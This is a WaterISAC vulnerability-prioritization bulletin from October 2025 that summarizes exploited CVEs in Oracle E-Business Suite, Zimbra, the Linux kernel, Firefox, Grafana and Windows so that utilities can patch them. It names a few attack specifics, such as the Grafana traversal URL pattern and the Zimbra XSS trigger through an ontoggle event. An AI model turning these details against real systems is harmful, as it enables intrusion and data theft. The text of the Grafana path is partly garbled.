(TLP:CLEAR) Weekly Vulnerabilities to Prioritize – October 9, 2025
Created: Thursday, October 9, 2025 - 14:46
Categories: Cybersecurity, Federal & State Resources, Security Preparedness
The below vulnerabilities have been identified by WaterISAC analysts as important for water and wastewater utilities to prioritize in their vulnerability management efforts. WaterISAC shares critical vulnerabilities that affect widely used products and may be under active exploitation. WaterISAC draws additional awareness in alerts and advisories when vulnerabilities are confirmed to be impacting, or have a high likelihood of impacting, water and wastewater utilities. Members are encouraged to regularly review these vulnerabilities, many of which are often included in CISA’s Known Exploited Vulnerabilities (KEV) Catalog.
Oracle E-Business Suite Zero-Day Vulnerability
CVSS Score: 9.8
CVE: CVE-2025-61882
Description: Oracle released an advisory for a zero-day vulnerability that was exploited in the wild. There have also been reports of the Clop ransomware group extorting this vulnerability in the Oracle E-Business Suite. This vulnerability is in the Oracle Concurrent Processing product of Oracle E-Business Suite (component: BI Publisher Integration). Supported versions that are affected are 12.2.3-12.2.14. This easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Concurrent Processing. Successful attacks of this vulnerability can result in takeover of Oracle Concurrent Processing. CISA has added this vulnerability to its KEV catalog.
Source: https://www.oracle.com/security-alerts/alert-cve-2025-61882.html
Additional Reading:
- CVE-2025-61882: Frequently Asked Questions About Oracle E-Business Suite (EBS) Zero-Day and Associated Vulnerabilities
- Dozens of Oracle customers impacted by Clop data theft for extortion campaign
Synacor Zimbra Collaboration Suite (ZCS) Cross-site Scripting Vulnerability
CVSS: N/A
CVE: CVE-2025-27915
Description: An issue was discovered in Zimbra Collaboration (ZCS) 9.0 and 10.0 and 10.1. A stored cross-site scripting (XSS) vulnerability exists in the Classic Web Client due to insufficient sanitization of HTML content in ICS files. When a user views an e-mail message containing a malicious ICS entry, its embedded JavaScript executes via an ontoggle event inside a <details> tag. This allows an attacker to run arbitrary JavaScript within the victim’s session, potentially leading to unauthorized actions such as setting e-mail filters to redirect messages to an attacker-controlled address. As a result, an attacker can perform unauthorized actions on the victim’s account, including e-mail redirection and data exfiltration. CISA has added this vulnerability to its KEV catalog.
Source: https://wiki.zimbra.com/wiki/Security_Center
Additional Reading:
Linux Kernel Heap Out-of-Bounds Write Vulnerability
CVSS: 8.3
CVE: CVE-2021-22555
Description: A heap out-of-bounds write affecting Linux since v2.6.19-rc1 was discovered in net/netfilter/x_tables.c. This allows an attacker to gain privileges or cause a DoS (via heap memory corruption) through user name space. CISA has added this vulnerability to its KEV catalog.
Source: https://github.com/google/security-research/security/advisories/GHSA-xxx5-8mvq-3528
Mozilla Multiple Products Remote Code Execution Vulnerability
CVSS: N/A
CVE: CVE-2010-3765
Description: Mozilla Firefox 3.5.x through 3.5.14 and 3.6.x through 3.6.11, Thunderbird 3.1.6 before 3.1.6 and 3.0.x before 3.0.10, and SeaMonkey 2.x before 2.0.10, when JavaScript is enabled, allows remote attackers to execute arbitrary code via vectors related to nsCSSFrameConstructor::ContentAppended, the appendChild method, incorrect index tracking, and the creation of multiple frames, which triggers memory corruption, as exploited in the wild in October 2010 by the Belmoo malware. CISA has added this vulnerability to its KEV catalog.
Source: https://blog.mozilla.org/security/2010/10/26/critical-vulnerability-in-firefox-3-5-and-firefox-3-6/
Grafana Path Traversal Vulnerability
CVSS Score: 7.5
CVE: CVE-2021-43798
Description: Certain versions of Grafana are susceptible to vulnerabilities which when successfully exploited could lead to disclosure of sensitive information. Grafana is an open-source platform for monitoring and observability. Grafana versions 8.0.0-beta1 through 8.3.0 (except for patched versions) iss vulnerable to directory traversal, allowing access to local files. The vulnerable URL path is: `<grafana_host_url>/public/plugins//`, where is the plugin ID for any installed plugin. At no time has Grafana Cloud been vulnerable. Users are advised to upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1. The GitHub Security Advisory contains more information about vulnerable URL paths, mitigation, and the disclosure timeline. CISA has added this vulnerability to its KEV catalog.
Source: https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p
Multiple Microsoft Vulnerabilities in Windows and Internet Explorer
CVE: CVE-2010-3962, CVE-2011-3042, CVE-2013-3918, CVE-2021-43226
Description: Multiple vulnerabilities in Microsoft Windows and Internet Explorer are known to be currently exploited by threat actors. CISA has added these vulnerabilities to its KEV catalog.
Source: https://www.cisa.gov/news-events/alerts/2025/10/06/cisa-adds-seven-known-exploited-vulnerabilities-catalog